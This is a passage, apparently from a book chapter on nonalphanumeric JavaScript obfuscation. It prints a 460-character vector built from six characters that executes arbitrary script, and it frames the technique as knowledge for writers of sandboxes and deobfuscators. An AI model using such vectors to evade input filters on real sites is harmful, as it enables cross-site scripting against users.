Minimizing the character set used to execute arbitrary JavaScript unfortunately tends to greatly lengthen the vectors. The shortest known vector, at the time of this writing, was contributed by LeverOne. The 460-character-long vector is:
[___=[[_=[]]==_]+_[__=/_/+_]][_____=[_____=__[++_]+__[_]]+[/_/[_______=[______=[____=[__=[_==_]+_[_]][___[+[]]+___[_+[+[]]]+___[++_]+__[+[]]+__[++_]+__[_/_]]+_][+[]][_]]+[____=____[_+_]]+___[_+_]+___[_]+__[+[]]+__[_/_]+__[++_]+______+__[+[]]+____+__[_/_]]+_][+[]][_/_+[_]]+___[_=_/_]+__[_++]+__[++_]+___[_+_]+__[_=+[]]+_____][___[++_+_]+____+______+___[_]+__[+[]]+___[_+[+[]]]+____+ ___[++_+_+_]]=[__=_[_______]+_][_____][__[_]+___[_/_]+__[_/_+[_/_]]+___[_+_]]
Is this the shortest possible vector using just six characters? Probably not. An entertaining exercise is to see if you can find a shorter version using any set of six characters. While you are at it, you just might break the Great JavaScript Charwall too!
Summary
The great thing about nonalphanumeric code is that you learn the innermost workings of the language. If you are attempting to write a sandbox or deobfuscate some malicious code, you need to learn the most extreme methods of hiding source code. You cannot write something good without knowing how to be evil first. The lessons learned in this chapter should keep you ahead of the game, improve your knowledge, and teach you how to hunt for creative ways to obfuscate.
We hope you have enjoyed looking at nonalphanumeric code. Now that you know how it works, why not experiment and come up with something new that we have not thought about? We are always on sla.ckers.org looking for interesting discussions; who knows, you might even break “The Wall” (but we doubt it).